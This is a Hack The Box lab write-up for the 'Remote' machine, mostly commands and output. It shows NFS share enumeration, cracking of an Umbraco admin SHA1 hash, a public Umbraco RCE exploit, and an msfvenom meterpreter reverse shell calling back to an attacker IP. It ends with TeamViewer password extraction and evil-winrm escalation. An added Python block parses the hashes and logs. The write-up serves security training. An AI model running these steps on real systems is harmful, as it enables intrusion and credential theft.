
HTB-[remote]

0x00. Summary

0x01. Information gathering

Key findings: ports 21 and 80 are open, and the host runs the NFS service together with mountd.

NFS (Network File System) is one of the file systems supported by FreeBSD; it lets computers on a network share resources. With NFS, a local NFS client application can transparently read and write files that live on a remote NFS server, exactly as if they were local files.

root@JIYE:~/htb/remote# nmap -sC -sV 10.10.10.180 -oN nmap.CV
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-31 06:09 EDT
Nmap scan report for 10.10.10.180
Host is up (0.38s latency).
Not shown: 993 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:
|_ SYST: Windows_NT
80/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Home - Acme Widgets
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/tcp6 rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 2,3,4 111/udp6 rpcbind
| 100003 2,3 2049/udp nfs
| 100003 2,3 2049/udp6 nfs
| 100003 2,3,4 2049/tcp nfs
| 100003 2,3,4 2049/tcp6 nfs
| 100005 1,2,3 2049/tcp mountd
| 100005 1,2,3 2049/tcp6 mountd
| 100005 1,2,3 2049/udp mountd
| 100005 1,2,3 2049/udp6 mountd
| 100021 1,2,3,4 2049/tcp nlockmgr
| 100021 1,2,3,4 2049/tcp6 nlockmgr
| 100021 1,2,3,4 2049/udp nlockmgr
| 100021 1,2,3,4 2049/udp6 nlockmgr
| 100024 1 2049/tcp status
| 100024 1 2049/tcp6 status
| 100024 1 2049/udp status
|_ 100024 1 2049/udp6 status
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
2049/tcp open mountd 1-3 (RPC #100005)
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 1m52s
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2020-08-31T10:12:50
|_ start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 86.17 seconds
root@JIYE:~/htb/remote#

0x02. FTP access

Nothing useful here.

0x03. Port 80

Manual crawling turns up an Umbraco login form.

Umbraco is a paid CMS.

0x04. Inspecting the NFS exports

Listing the exported directories shows a website backup share, exported to everyone.

root@JIYE:~/htb/remote# showmount -e 10.10.10.180
Export list for 10.10.10.180:
/site_backups (everyone)
root@JIYE:~/htb/remote#

Mount it locally and take a look.

root@JIYE:~/htb/remote# mkdir site_backups
root@JIYE:~/htb/remote# mount 10.10.10.180:site_backups site_backups/
root@JIYE:~/htb/remote# cd site_backups/
root@JIYE:~/htb/remote/site_backups# ls
App_Browsers App_Plugins bin css Global.asax scripts Umbraco_Client Web.config
App_Data aspnet_client Config default.aspx Media Umbraco Views
root@JIYE:~/htb/remote/site_backups#

Search the Umbraco.sdf database for strings containing admin.

root@JIYE:~/htb/remote/site_backups# cd App_Data/
root@JIYE:~/htb/remote/site_backups/App_Data# ls
cache Logs Models packages TEMP umbraco.config Umbraco.sdf
root@JIYE:~/htb/remote/site_backups/App_Data# strings Umbraco.sdf | grep admin
Administratoradmindefaulten-US
Administratoradmindefaulten-USb22924d5-57de-468e-9df4-0961cf6aa30d
Administratoradminb8be16afba8c314ad33d812f22a04991b90e2aaa{"hashAlgorithm":"SHA1"}en-USf8512f97-cab1-4a4b-a49f-0a2054c47a1d
adminadmin@htb.localb8be16afba8c314ad33d812f22a04991b90e2aaa{"hashAlgorithm":"SHA1"}admin@htb.localen-USfeb1a998-d3bf-406a-b30b-e269d7abdf50
adminadmin@htb.localb8be16afba8c314ad33d812f22a04991b90e2aaa{"hashAlgorithm":"SHA1"}admin@htb.localen-US82756c26-4321-4d27-b429-1b5c7c4f882f
User "admin" <admin@htb.local>192.168.195.1User "admin" <admin@htb.local>umbraco/user/password/changepassword change
User "admin" <admin@htb.local>192.168.195.1User "admin" <admin@htb.local>umbraco/user/sign-in/logoutlogout success
User "SYSTEM" 192.168.195.1User "admin" <admin@htb.local>umbraco/user/saveupdating LastLoginDate, LastPasswordChangeDate, UpdateDate
User "SYSTEM" 192.168.195.1User "admin" <admin@htb.local>umbraco/user/sign-in/loginlogin success
User "admin" <admin@htb.local>192.168.195.1User "admin" <admin@htb.local>umbraco/user/sign-in/logoutlogout success
User "SYSTEM" 192.168.195.1User "admin" <admin@htb.local>umbraco/user/saveupdating LastLoginDate, LastPasswordChangeDate, UpdateDate
User "SYSTEM" 192.168.195.1User "admin" <admin@htb.local>umbraco/user/sign-in/loginlogin success
User "admin" <admin@htb.local>192.168.195.1User "smith" <smith@htb.local>umbraco/user/saveupdating SessionTimeout, SecurityStamp, CreateDate, UpdateDate, Id, HasIdentity
User "admin" <admin@htb.local>192.168.195.1User "smith" <smith@htb.local>umbraco/user/saveupdating LastPasswordChangeDate, RawPasswordValue, SecurityStamp, UpdateDate
User "admin" <admin@htb.local>192.168.195.1User "smith" <smith@htb.local>umbraco/user/saveupdating Key, IsApproved, Groups, UpdateDate; groups assigned: writer
User "admin" <admin@htb.local>192.168.195.1User "admin" <admin@htb.local>umbraco/user/sign-in/logoutlogout success
User "SYSTEM" 192.168.195.1User "admin" <admin@htb.local>umbraco/user/saveupdating LastLoginDate, LastPasswordChangeDate, UpdateDate
User "SYSTEM" 192.168.195.1User "admin" <admin@htb.local>umbraco/user/sign-in/loginlogin success
User "admin" <admin@htb.local>192.168.195.1User "smith" <smith@htb.local>umbraco/user/saveupdating LastPasswordChangeDate, RawPasswordValue, SecurityStamp, UpdateDate
User "admin" <admin@htb.local>192.168.195.1User "smith" <smith@htb.local>umbraco/user/password/changepassword change
User "admin" <admin@htb.local>192.168.195.1User "smith" <smith@htb.local>umbraco/user/saveupdating Key, Groups, UpdateDate; groups assigned: writer
User "admin" <admin@htb.local>192.168.195.1User "admin" <admin@htb.local>umbraco/user/sign-in/logoutlogout success
User "SYSTEM" 192.168.195.1User "admin" <admin@htb.local>umbraco/user/saveupdating LastLoginDate, LastPasswordChangeDate, UpdateDate
User "SYSTEM" 192.168.195.1User "admin" <admin@htb.local>umbraco/user/sign-in/loginlogin success
User "admin" <admin@htb.local>192.168.195.1User "ssmith" <smith@htb.local>umbraco/user/saveupdating Name, Key, Groups, UpdateDate; groups assigned: writer
User "admin" <admin@htb.local>192.168.195.1User "admin" <admin@htb.local>umbraco/user/sign-in/logoutlogout success
User "SYSTEM" 192.168.195.1User "admin" <admin@htb.local>umbraco/user/saveupdating LastLoginDate, LastPasswordChangeDate, UpdateDate
User "SYSTEM" 192.168.195.1User "admin" <admin@htb.local>umbraco/user/sign-in/loginlogin success
User "admin" <admin@htb.local>192.168.195.1User "ssmith" <ssmith@htb.local>umbraco/user/saveupdating Username, Email, Key, Groups, UpdateDate; groups assigned: writer
User "admin" <admin@htb.local>192.168.195.1User "admin" <admin@htb.local>umbraco/user/sign-in/logoutlogout success
User "SYSTEM" 192.168.195.1User "admin" <admin@htb.local>umbraco/user/saveupdating LastLoginDate, LastPasswordChangeDate, UpdateDate
User "SYSTEM" 192.168.195.1User "admin" <admin@htb.local>umbraco/user/sign-in/loginlogin success
User "admin" <admin@htb.local>192.168.195.1User "ssmith" <ssmith@htb.local>umbraco/user/saveupdating LastPasswordChangeDate, RawPasswordValue, SecurityStamp, UpdateDate
User "admin" <admin@htb.local>192.168.195.1User "ssmith" <ssmith@htb.local>umbraco/user/password/changepassword change
User "admin" <admin@htb.local>192.168.195.1User "ssmith" <ssmith@htb.local>umbraco/user/saveupdating Key, Groups, UpdateDate; groups assigned: writer
User "admin" <admin@htb.local>192.168.195.1User "admin" <admin@htb.local>umbraco/user/sign-in/logoutlogout success
User "SYSTEM" 192.168.195.1User "admin" <admin@htb.local>umbraco/user/saveupdating LastLoginDate, UpdateDate
User "SYSTEM" 192.168.195.1User "admin" <admin@htb.local>umbraco/user/sign-in/loginlogin success
User "admin" <admin@htb.local>192.168.195.1User "admin" <admin@htb.local>umbraco/user/sign-in/logoutlogout success
User "admin" <admin@htb.local>192.168.195.1User "admin" <admin@htb.local>umbraco/user/saveupdating LastLoginDate, UpdateDate
User "admin" <admin@htb.local>192.168.195.1User "admin" <admin@htb.local>umbraco/user/sign-in/loginlogin success
User "admin" <admin@htb.local>192.168.195.1User "admin" <admin@htb.local>umbraco/user/saveupdating FailedPasswordAttempts, UpdateDate
User "admin" <admin@htb.local>192.168.195.1umbraco/user/sign-in/failedlogin failed
User "admin" <admin@htb.local>192.168.195.1User "admin" <admin@htb.local>umbraco/user/saveupdating FailedPasswordAttempts, UpdateDate
User "admin" <admin@htb.local>192.168.195.1User "admin" <admin@htb.local>umbraco/user/saveupdating LastLoginDate, UpdateDate
User "admin" <admin@htb.local>192.168.195.1User "admin" <admin@htb.local>umbraco/user/sign-in/loginlogin success
User "admin" <admin@htb.local>192.168.195.1User "admin" <admin@htb.local>umbraco/user/saveupdating LastPasswordChangeDate, RawPasswordValue, SecurityStamp, UpdateDate
User "admin" <admin@htb.local>192.168.195.1User "admin" <admin@htb.local>umbraco/user/password/changepassword change
User "admin" <admin@htb.local>192.168.195.1User "admin" <admin@htb.local>umbraco/user/sign-in/logoutlogout success
User "SYSTEM" 192.168.195.1User "admin" <admin@htb.local>umbraco/user/saveupdating LastLoginDate, LastPasswordChangeDate, UpdateDate
User "SYSTEM" 192.168.195.1User "admin" <admin@htb.local>umbraco/user/sign-in/loginlogin success
User "admin" <admin@htb.local>192.168.195.1User "admin" <admin@htb.local>umbraco/user/saveupdating LastPasswordChangeDate, RawPasswordValue, SecurityStamp, UpdateDate
User "admin" <admin@htb.local>192.168.195.1User "admin" <admin@htb.local>umbraco/user/password/changepassword change
User "admin" <admin@htb.local>192.168.195.1User "admin" <admin@htb.local>umbraco/user/sign-in/logoutlogout success
User "SYSTEM" 192.168.195.1User "admin" <admin@htb.local>umbraco/user/saveupdating LastLoginDate, LastPasswordChangeDate, UpdateDate
User "SYSTEM" 192.168.195.1User "admin" <admin@htb.local>umbraco/user/sign-in/loginlogin success
adminAdministratorsCADMOSKTPIURZ:5F7
User "admin" <admin@htb.local>192.168.195.1User "admin" <admin@htb.local>umbraco/user/saveupdating TourData, UpdateDate
User "SYSTEM" 192.168.195.137User "admin" <admin@htb.local>umbraco/user/saveupdating LastLoginDate, UpdateDate
User "SYSTEM" 192.168.195.137User "admin" <admin@htb.local>umbraco/user/sign-in/loginlogin success
User "SYSTEM" 192.168.195.137User "admin" <admin@htb.local>umbraco/user/saveupdating LastLoginDate, UpdateDate
User "SYSTEM" 192.168.195.137User "admin" <admin@htb.local>umbraco/user/sign-in/loginlogin success
User "SYSTEM" 192.168.195.137User "admin" <admin@htb.local>umbraco/user/saveupdating LastLoginDate, UpdateDate
User "SYSTEM" 192.168.195.137User "admin" <admin@htb.local>umbraco/user/sign-in/loginlogin success
User "SYSTEM" 192.168.195.137User "admin" <admin@htb.local>umbraco/user/saveupdating LastLoginDate, UpdateDate
User "SYSTEM" 192.168.195.137User "admin" <admin@htb.local>umbraco/user/sign-in/loginlogin success
User "SYSTEM" 192.168.195.137User "admin" <admin@htb.local>umbraco/user/saveupdating LastLoginDate, UpdateDate
User "SYSTEM" 192.168.195.137User "admin" <admin@htb.local>umbraco/user/sign-in/loginlogin success
User "SYSTEM" 192.168.195.137User "admin" <admin@htb.local>umbraco/user/saveupdating LastLoginDate, UpdateDate
User "SYSTEM" 192.168.195.137User "admin" <admin@htb.local>umbraco/user/sign-in/loginlogin success
User "SYSTEM" 192.168.195.137User "admin" <admin@htb.local>umbraco/user/saveupdating LastLoginDate, UpdateDate
User "SYSTEM" 192.168.195.137User "admin" <admin@htb.local>umbraco/user/sign-in/loginlogin success
User "SYSTEM" 192.168.195.137User "admin" <admin@htb.local>umbraco/user/saveupdating LastLoginDate, UpdateDate
User "SYSTEM" 192.168.195.137User "admin" <admin@htb.local>umbraco/user/sign-in/loginlogin success
User "SYSTEM" 192.168.195.137User "admin" <admin@htb.local>umbraco/user/saveupdating LastLoginDate, UpdateDate
User "SYSTEM" 192.168.195.137User "admin" <admin@htb.local>umbraco/user/sign-in/loginlogin success
User "SYSTEM" 192.168.195.1User "admin" <admin@htb.local>umbraco/user/saveupdating LastLoginDate, UpdateDate
User "SYSTEM" 192.168.195.1User "admin" <admin@htb.local>umbraco/user/sign-in/loginlogin success
User "SYSTEM" 192.168.195.1User "admin" <admin@htb.local>umbraco/user/saveupdating LastLoginDate, UpdateDate
User "SYSTEM" 192.168.195.1User "admin" <admin@htb.local>umbraco/user/sign-in/loginlogin success
User "admin" <admin@htb.local>192.168.195.1User "admin" <admin@htb.local>umbraco/user/sign-in/logoutlogout success
User "SYSTEM" 192.168.195.1User "admin" <admin@htb.local>umbraco/user/saveupdating LastLoginDate, UpdateDate
User "SYSTEM" 192.168.195.1User "admin" <admin@htb.local>umbraco/user/sign-in/loginlogin success
User "admin" <admin@htb.local>192.168.195.1User "admin" <admin@htb.local>umbraco/user/saveupdating LastPasswordChangeDate, RawPasswordValue, SecurityStamp, UpdateDate
root@JIYE:~/htb/remote/site_backups/App_Data#

The important information here is that the admin user is admin@htb.local, and its password hash is the following:

admin@htb.localb8be16afba8c314ad33d812f22a04991b90e2aaa{"hashAlgorithm":"SHA1"}
User "SYSTEM" 192.168.195.1User "admin" <admin@htb.local>umbraco/user/sign-in/loginlogin success

Crack the hash: URL

Save the user and password:

root@JIYE:~/htb/remote# cat user.txt 
user:admin@htb.local
hash:b8be16afba8c314ad33d812f22a04991b90e2aaa
crack:baconandcheese
root@JIYE:~/htb/remote#
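As an added example (not part of the original writeup), the following Python parses the `strings Umbraco.sdf` output shown above: it pulls the stored password hash and its algorithm out of the flattened user rows, checks whether a candidate password is the unsalted SHA1 that the `{"hashAlgorithm":"SHA1"}` blob declares (which is why a wordlist run recovers it so quickly), and turns the audit-trail rows into structured sign-in events that a detection rule could key on. The sample lines are copied from the output above; the regexes encode my own assumption about the column order in the flattened rows.

```python
import hashlib
import re
from collections import Counter

# Sample lines copied from the `strings Umbraco.sdf | grep admin` output above.
# SQL CE row columns come out concatenated with no delimiter, so fields are
# recovered with anchored patterns rather than by splitting on a separator.
SAMPLE_LINES = [
    "Administratoradmindefaulten-US",
    'Administratoradminb8be16afba8c314ad33d812f22a04991b90e2aaa{"hashAlgorithm":"SHA1"}'
    "en-USf8512f97-cab1-4a4b-a49f-0a2054c47a1d",
    'adminadmin@htb.localb8be16afba8c314ad33d812f22a04991b90e2aaa{"hashAlgorithm":"SHA1"}'
    "admin@htb.localen-USfeb1a998-d3bf-406a-b30b-e269d7abdf50",
    'User "SYSTEM" 192.168.195.1User "admin" <admin@htb.local>umbraco/user/sign-in/loginlogin success',
    'User "admin" <admin@htb.local>192.168.195.1umbraco/user/sign-in/failedlogin failed',
    'User "admin" <admin@htb.local>192.168.195.1User "smith" <smith@htb.local>'
    "umbraco/user/saveupdating Key, IsApproved, Groups, UpdateDate; groups assigned: writer",
    'User "SYSTEM" 192.168.195.137User "admin" <admin@htb.local>umbraco/user/sign-in/loginlogin success',
]

# The password column sits directly before the JSON blob naming its algorithm.
# Legacy Umbraco stores an unsalted SHA1 as exactly 40 hex chars; the lookbehind
# stops the match from swallowing hex-looking characters of the preceding column.
HASH_META_RE = re.compile(
    r'(?<![0-9a-fA-F])(?P<hash>[0-9a-fA-F]{40})\{"hashAlgorithm":"(?P<algo>[^"]+)"\}'
)

# Audit rows: actor, source IP, optional target user, request path, then the
# message. Path and message are glued together, so the path is matched lazily
# up to a known message prefix.
AUDIT_RE = re.compile(
    r'^User "(?P<actor>[^"]+)"(?: <(?P<actor_mail>[^>]+)>)? ?'
    r"(?P<ip>\d{1,3}(?:\.\d{1,3}){3})"
    r'(?:User "(?P<target>[^"]+)"(?: <(?P<target_mail>[^>]+)>)?)?'
    r"(?P<path>umbraco/\S*?)"
    r"(?P<msg>login success|login failed|logout success|password change|updating .*)$"
)

# Algorithms that give no per-user salt and no work factor: offline guessing is cheap.
UNSALTED_ALGOS = {"SHA1", "MD5"}


def extract_password_hashes(lines):
    """Return unique (hash, algorithm) pairs found in flattened user rows."""
    found = []
    for line in lines:
        for m in HASH_META_RE.finditer(line):
            pair = (m.group("hash").lower(), m.group("algo").upper())
            if pair not in found:
                found.append(pair)
    return found


def sha1_matches(hash_hex, candidate):
    """True if the stored value is the unsalted SHA1 of candidate (legacy Umbraco scheme)."""
    return hashlib.sha1(candidate.encode("utf-8")).hexdigest() == hash_hex.lower()


def parse_audit_events(lines):
    """Return audit-trail rows as dicts; lines that are not audit rows are skipped."""
    return [m.groupdict() for m in map(AUDIT_RE.match, lines) if m]


def sign_in_outcomes_by_ip(events):
    """Count login successes and failures per source IP, the key a detection rule would use."""
    counts = Counter()
    for e in events:
        if e["msg"] in ("login success", "login failed"):
            counts[(e["ip"], e["msg"])] += 1
    return counts


if __name__ == "__main__":
    for digest, algo in extract_password_hashes(SAMPLE_LINES):
        weak = "unsalted, fast to guess offline" if algo in UNSALTED_ALGOS else "ok"
        print(f"hash {digest} algorithm {algo}: {weak}")
    for (ip, outcome), n in sorted(sign_in_outcomes_by_ip(parse_audit_events(SAMPLE_LINES)).items()):
        print(f"{ip:16} {outcome:14} {n}")
```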

0x05. Finding an Umbraco exploit

exp URL

0x06. Exploitation

root@JIYE:~/htb/remote# git clone https://github.com/noraj/Umbraco-RCE.git
root@JIYE:~/htb/remote# ls
nmap.CV site_backups Umbraco-RCE user.txt
root@JIYE:~/htb/remote# cd Umbraco-RCE/
root@JIYE:~/htb/remote/Umbraco-RCE# ls
exploit.py LICENSE README.md requirements.txt
root@JIYE:~/htb/remote/Umbraco-RCE#

Check the parameters:

Usage
$ python exploit.py -h
usage: exploit.py [-h] -u USER -p PASS -i URL -c CMD [-a ARGS]

Umbraco authenticated RCE

optional arguments:
-h, --help show this help message and exit
-u USER, --user USER username / email
-p PASS, --password PASS password
-i URL, --host URL root URL
-c CMD, --command CMD command
-a ARGS, --arguments ARGS arguments
Examples:

$ python exploit.py -u admin@example.org -p password123 -i 'http://10.0.0.1' -c ipconfig
$ python exploit.py -u admin@example.org -p password123 -i 'http://10.0.0.1' -c powershell.exe -a '-NoProfile -Com

Exploit:

root@JIYE:~/htb/remote/Umbraco-RCE# python3 exploit.py -u admin@htb.local -p baconandcheese -i 'http://10.10.10.180' -c powershell.exe -a 'ls C:/'


Directory: C:\

Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 2/20/2020 1:13 AM ftp_transfer
d----- 2/19/2020 3:11 PM inetpub
d----- 2/19/2020 11:09 PM Microsoft
d----- 9/15/2018 3:19 AM PerfLogs
d-r--- 2/23/2020 2:19 PM Program Files
d----- 2/23/2020 2:19 PM Program Files (x86)
d----- 8/31/2020 4:27 AM site_backups
d-r--- 2/19/2020 3:12 PM Users
d----- 2/20/2020 12:52 AM Windows

root@JIYE:~/htb/remote/Umbraco-RCE#

Look at the web root; note the Media directory, which will be useful later.

root@JIYE:~/htb/remote/Umbraco-RCE# python3 exploit.py -u admin@htb.local -p baconandcheese -i 'http://10.10.10.180' -c powershell.exe -a 'ls C:/inetpub'


Directory: C:\inetpub

Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 2/19/2020 3:11 PM custerr
d----- 2/19/2020 3:11 PM ftproot
d----- 2/20/2020 1:33 AM history
d----- 2/19/2020 4:36 PM logs
d----- 2/19/2020 3:11 PM temp
d----- 2/20/2020 12:16 PM wwwroot

root@JIYE:~/htb/remote/Umbraco-RCE# python3 exploit.py -u admin@htb.local -p baconandcheese -i 'http://10.10.10.180' -c powershell.exe -a 'ls C:/inetpub/wwwroot'


Directory: C:\inetpub\wwwroot

Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 2/19/2020 6:02 PM App_Browsers
d----- 2/20/2020 1:59 AM App_Data
d----- 2/19/2020 10:29 PM App_Plugins
d----- 2/19/2020 3:12 PM aspnet_client
d----- 2/19/2020 11:30 PM bin
d----- 2/19/2020 6:02 PM Config
d----- 2/19/2020 10:29 PM css
d----- 8/31/2020 7:57 AM Media
d----- 2/19/2020 10:29 PM scripts
d----- 2/19/2020 6:02 PM Umbraco
d----- 2/19/2020 6:02 PM Umbraco_Client
d----- 2/19/2020 10:29 PM Views
-a---- 11/1/2018 1:06 PM 152 default.aspx
-a---- 11/1/2018 1:06 PM 89 Global.asax
-a---- 2/20/2020 12:57 AM 28539 Web.config
root@JIYE:~/htb/remote/Umbraco-RCE#

0x07. Logging in to the web application

The Media section allows file uploads, and it also contains an exe that some "predecessor" had already uploaded 😂

Generate an exe with msf and upload it:

root@JIYE:~/htb/remote# msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.17.216 LPORT=6666 -f exe -o demo.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 341 bytes
Final size of exe file: 73802 bytes
Saved as: demo.exe
root@JIYE:~/htb/remote# ls
demo.exe nmap.CV site_backups Umbraco-RCE user.txt
root@JIYE:~/htb/remote#

Upload demo.exe; at this point it has not actually landed in the Media directory.

Upload again.

Enter a name and click Save.

This time the upload succeeds.

Checking again from the command line, the file is there: the upload worked.

root@JIYE:~/htb/remote/Umbraco-RCE# python3 exploit.py -u admin@htb.local -p baconandcheese -i 'http://10.10.10.180' -c powershell.exe -a 'ls C:/inetpub/wwwroot/Media/1033'


Directory: C:\inetpub\wwwroot\Media\1036


Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 8/31/2020 8:57 AM 73802 demo.exe

root@JIYE:~/htb/remote/Umbraco-RCE#

0x08. Reverse shell

Start the msf listener:

msf5 > use multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set lhost 10.10.17.216
lhost => 10.10.17.216
msf5 exploit(multi/handler) > set lport 6666
lport => 6666
msf5 exploit(multi/handler) >
msf5 exploit(multi/handler) > run

[*] Started reverse TCP handler on 10.10.17.216:6666


Execute demo.exe:

root@JIYE:~/htb/remote/Umbraco-RCE# python3 exploit.py -u admin@htb.local -p baconandcheese -i 'http://10.10.10.180' -c powershell.exe -a 'C:/inetpub/wwwroot/Media/1033/demo.exe'

Shell obtained:

msf5 exploit(multi/handler) > run

[*] Started reverse TCP handler on 10.10.17.216:6666
[*] Sending stage (176195 bytes) to 10.10.10.180
[*] Meterpreter session 1 opened (10.10.17.216:6666 -> 10.10.10.180:49688) at 2020-08-31 10:41:25 -0400

meterpreter > whoami
[-] Unknown command: whoami.
meterpreter > getuid
Server username: IIS APPPOOL\DefaultAppPool
meterpreter >

Find user.txt:

meterpreter > shell
Process 3180 created.
Channel 1 created.
Microsoft Windows [Version 10.0.17763.107]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\windows\system32\inetsrv>whoami
whoami
iis apppool\defaultapppool

C:\windows\system32\inetsrv>cd\
cd\

C:\>dir
dir
Volume in drive C has no label.
Volume Serial Number is BE23-EB3E

Directory of C:\

02/20/2020 02:13 AM <DIR> ftp_transfer
02/19/2020 04:11 PM <DIR> inetpub
02/20/2020 12:09 AM <DIR> Microsoft
09/15/2018 03:19 AM <DIR> PerfLogs
02/23/2020 03:19 PM <DIR> Program Files
02/23/2020 03:19 PM <DIR> Program Files (x86)
08/31/2020 09:32 AM <DIR> site_backups
02/19/2020 04:12 PM <DIR> Users
02/20/2020 01:52 AM <DIR> Windows
0 File(s) 0 bytes
9 Dir(s) 19,406,811,136 bytes free

C:\>cd Users
cd Users

C:\Users>dir
dir
Volume in drive C has no label.
Volume Serial Number is BE23-EB3E

Directory of C:\Users

02/19/2020 04:12 PM <DIR> .
02/19/2020 04:12 PM <DIR> ..
02/19/2020 04:12 PM <DIR> .NET v2.0
02/19/2020 04:12 PM <DIR> .NET v2.0 Classic
02/19/2020 04:12 PM <DIR> .NET v4.5
02/19/2020 04:12 PM <DIR> .NET v4.5 Classic
08/31/2020 10:33 AM <DIR> Administrator
02/19/2020 04:12 PM <DIR> Classic .NET AppPool
02/20/2020 03:42 AM <DIR> Public
0 File(s) 0 bytes
9 Dir(s) 19,406,811,136 bytes free

C:\Users>cd Public
cd Public

C:\Users\Public>dir
dir
Volume in drive C has no label.
Volume Serial Number is BE23-EB3E

Directory of C:\Users\Public

02/20/2020 03:42 AM <DIR> .
02/20/2020 03:42 AM <DIR> ..
02/19/2020 04:03 PM <DIR> Documents
09/15/2018 03:19 AM <DIR> Downloads
09/15/2018 03:19 AM <DIR> Music
09/15/2018 03:19 AM <DIR> Pictures
08/31/2020 10:33 AM 34 user.txt
09/15/2018 03:19 AM <DIR> Videos
1 File(s) 34 bytes
7 Dir(s) 19,406,798,848 bytes free

C:\Users\Public>type user.txt
type user.txt
****************************

C:\Users\Public>

0x09. Privilege escalation

Looking through the program directories shows that TeamViewer is installed.

C:\>cd program files
cd program files

C:\Program Files>dir
dir
Volume in drive C has no label.
Volume Serial Number is BE23-EB3E

Directory of C:\Program Files

02/23/2020 03:19 PM <DIR> .
02/23/2020 03:19 PM <DIR> ..
02/19/2020 04:04 PM <DIR> Common Files
09/15/2018 05:06 AM <DIR> internet explorer
02/23/2020 03:16 PM <DIR> Microsoft SQL Server
02/19/2020 04:11 PM <DIR> MSBuild
02/19/2020 04:11 PM <DIR> Reference Assemblies
02/19/2020 04:04 PM <DIR> VMware
02/20/2020 07:46 AM <DIR> Windows Defender
09/15/2018 05:05 AM <DIR> Windows Defender Advanced Threat Protection
09/15/2018 03:19 AM <DIR> Windows Mail
10/29/2018 06:39 PM <DIR> Windows Media Player
09/15/2018 03:19 AM <DIR> Windows Multimedia Platform
09/15/2018 03:28 AM <DIR> windows nt
10/29/2018 06:39 PM <DIR> Windows Photo Viewer
09/15/2018 03:19 AM <DIR> Windows Portable Devices
09/15/2018 03:19 AM <DIR> Windows Security
09/15/2018 03:19 AM <DIR> WindowsPowerShell
0 File(s) 0 bytes
18 Dir(s) 19,407,548,416 bytes free


C:\>cd program files (x86)
cd program files (x86)

C:\Program Files (x86)>dir
dir
Volume in drive C has no label.
Volume Serial Number is BE23-EB3E

Directory of C:\Program Files (x86)

02/23/2020 03:19 PM <DIR> .
02/23/2020 03:19 PM <DIR> ..
09/15/2018 03:28 AM <DIR> Common Files
09/15/2018 05:06 AM <DIR> Internet Explorer
02/23/2020 03:19 PM <DIR> Microsoft SQL Server
02/23/2020 03:15 PM <DIR> Microsoft.NET
02/19/2020 04:11 PM <DIR> MSBuild
02/19/2020 04:11 PM <DIR> Reference Assemblies
02/20/2020 03:14 AM <DIR> TeamViewer
09/15/2018 05:05 AM <DIR> Windows Defender
09/15/2018 03:19 AM <DIR> Windows Mail
10/29/2018 06:39 PM <DIR> Windows Media Player
09/15/2018 03:19 AM <DIR> Windows Multimedia Platform
09/15/2018 03:28 AM <DIR> windows nt
10/29/2018 06:39 PM <DIR> Windows Photo Viewer
09/15/2018 03:19 AM <DIR> Windows Portable Devices
09/15/2018 03:19 AM <DIR> WindowsPowerShell
0 File(s) 0 bytes
17 Dir(s) 19,407,241,216 bytes free

C:\Program Files (x86)>

Check the TeamViewer version: it is v7.

C:\Program Files (x86)>cd teamviewer
cd teamviewer

C:\Program Files (x86)\TeamViewer>dir
dir
Volume in drive C has no label.
Volume Serial Number is BE23-EB3E

Directory of C:\Program Files (x86)\TeamViewer

02/20/2020 03:14 AM <DIR> .
02/20/2020 03:14 AM <DIR> ..
02/27/2020 11:35 AM <DIR> Version7
0 File(s) 0 bytes
3 Dir(s) 19,405,176,832 bytes free

C:\Program Files (x86)\TeamViewer>

Recover the TeamViewer password with msf; the password is !R3m0te!

meterpreter > run post/windows/gather/credentials/teamviewer_passwords

[*] Finding TeamViewer Passwords on REMOTE
[+] Found Unattended Password: !R3m0te!
[+] Passwords stored in: /root/.msf4/loot/20200831110133_default_10.10.10.180_host.teamviewer__720435.txt
[*] <---------------- | Using Window Technique | ---------------->
[*] TeamViewer's language setting options are ''
[*] TeamViewer's version is ''
[-] Unable to find TeamViewer's process
meterpreter >

Escalate with evil-winrm (tool URL):

root@JIYE:~/htb/remote# proxychains gem install winrm winrm-fs stringio
root@JIYE:~/htb/remote# git clone https://github.com/Hackplayers/evil-winrm.git
正克隆到 'evil-winrm'...
remote: Enumerating objects: 22, done.
remote: Counting objects: 100% (22/22), done.
remote: Compressing objects: 100% (16/16), done.
remote: Total 805 (delta 9), reused 17 (delta 6), pack-reused 783
接收对象中: 100% (805/805), 1.96 MiB | 1.35 MiB/s, 完成.
处理 delta 中: 100% (461/461), 完成.
root@JIYE:~/htb/remote# ls
demo.exe evil-winrm flag nmap.CV site_backups Umbraco-RCE user.txt
root@JIYE:~/htb/remote#

Check the relevant parameters:

Usage: evil-winrm -i IP -u USER [-s SCRIPTS_PATH] [-e EXES_PATH] [-P PORT] [-p PASS] [-H HASH] [-U URL] [-S] [-c PUBLIC_KEY_PATH ] [-k PRIVATE_KEY_PATH ] [-r REALM]
-S, --ssl Enable ssl
-c, --pub-key PUBLIC_KEY_PATH Local path to public key certificate
-k, --priv-key PRIVATE_KEY_PATH Local path to private key certificate
-r, --realm DOMAIN Kerberos auth, it has to be set also in /etc/krb5.conf file using this format -> CONTOSO.COM = { kdc = fooserver.contoso.com }
-s, --scripts PS_SCRIPTS_PATH Powershell scripts local path
-e, --executables EXES_PATH C# executables local path
-i, --ip IP Remote host IP or hostname (required)
-U, --url URL Remote url endpoint (default wsman)
